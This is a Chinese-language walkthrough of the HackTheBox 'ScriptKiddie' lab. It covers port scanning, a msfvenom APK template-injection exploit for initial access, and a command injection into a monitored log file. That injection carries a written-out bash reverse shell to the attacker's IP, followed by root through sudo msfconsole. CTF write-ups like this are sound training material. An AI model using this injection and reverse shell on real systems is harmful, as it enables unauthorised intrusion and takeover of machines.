HackTheBox—ScriptKiddi

 在HTB里面看到了一些新的靶場，便開始了靶場之路

    ScriptKiddie 難度4.1，感覺還行，開啟環(huán)境，先訪問下ip

拒絕訪問，說明具有web站點，但80端口未開放，nmap掃描端口

開放了22，5000，8000，8888端口，但5000端口和8888端口打開是拒絕訪問，所以從5000端口入手

工具集成的頁面，nmap、msfvenom、searchsploit三款工具集成，先使用nmap ping127.0.0.1看下信息

兩個端口22和5000，版本7.80，搜索一圈后沒發(fā)現(xiàn)nmap7.80存在可利用漏洞，目光轉(zhuǎn)向mfvenom，在exploit-db里找到一篇msfvenom apk模板注入，可以利用

因為有提供payload，下載之后保存到本地

運(yùn)行payload會提示沒有jarsigner命令，執(zhí)行sudo apt-get install openjdk-11-jdk-headless，然后修改payload

這里注意ip，如果是虛擬機(jī)先下載openvpn(sudo apt-get openvpn) 在htb上下載配置文件，直接用openvpn打開就可以

查看下自己的ip，確認(rèn)和靶機(jī)在同一個段，然后運(yùn)行payload會生成一個evil.apk文件，在venom處上傳apk文件，同時監(jiān)聽443端口

第二種方法：msf生成，在msf里搜索venom，調(diào)用第一個，設(shè)置好ip和端口，然后執(zhí)行，在本地生成一個msf.apk，監(jiān)聽端口，上傳，得到shell

相比較而言，第二種更穩(wěn)定一點。得到shell之后切換到home目錄可以看到存在kid和pwn兩個用戶，進(jìn)入kid用戶，可以看到user.txt，得到普通用戶的flag

在pwn用戶下看到存在scanlosers.sh文件，查看發(fā)現(xiàn)scanlosers.sh會一直掃描/home/kid/logs/hackers文件中的ip，但是該shell腳本未對hackers文件傳入的內(nèi)容做過濾，且/home/kid/logs/hackers文件當(dāng)前用戶kid可編輯

因此可以通過寫入惡意代碼“test  ;/bin/bash -c 'bash -i >&/dev/tcp/10.10.14.2/8888 0>&1' #”，利用命令注入獲得pwn用戶的shell

得到pwn用戶的shell，sudo -l發(fā)現(xiàn)不需要密碼的sudo程序

sudo /opt/metasploit-framework-6.0.0/msfconsole

切換至root目錄，查看

發(fā)現(xiàn)root.txt，查看該txt文件得到root用戶的flag

提交，完事

注意事項：1、exp下載之后需要執(zhí)行sudo apt-get install openjdk-11-jdk-headless命令

                  2、注意ip，確認(rèn)主機(jī)和靶機(jī)在同一網(wǎng)段，如果是虛擬機(jī)，先下載openvpn，然后下載配置文件，使用openvpn打開即可

                  3、如果上傳的時候nc無法反彈回shell，可以重置一下靶機(jī)，刪除已經(jīng)生成好的apk文件重新生成一個apk文件，在進(jìn)行上傳